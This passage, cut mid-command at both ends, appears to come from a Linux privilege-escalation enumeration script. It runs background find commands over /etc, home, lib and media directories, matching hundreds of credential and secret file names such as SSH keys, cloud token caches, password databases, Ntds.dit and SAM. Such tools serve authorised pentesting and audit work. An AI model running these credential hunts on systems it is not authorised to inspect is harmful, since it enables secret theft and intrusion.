\".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find ${ROOT_FOLDER}etc -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"exports\" -o -name \"credentials.db\" -o -name \"apt.conf\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"*knockd*\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"ssh*config\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"drives.xml\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"security.sav\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB=`eval_bckgrd "find ${ROOT_FOLDER}lib -name \"*.timer\" -o -name \"rocketchat.service\" -o -name \"*.service\" -o -name \"*.socket\" -o -name \"log4j-core*.jar\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB32=`eval_bckgrd "find ${ROOT_FOLDER}lib32 -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" -o -name \"log4j-core*.jar\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB64=`eval_bckgrd "find ${ROOT_FOLDER}lib64 -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" -o -name \"log4j-core*.jar\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd "find ${ROOT_FOLDER}media -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name 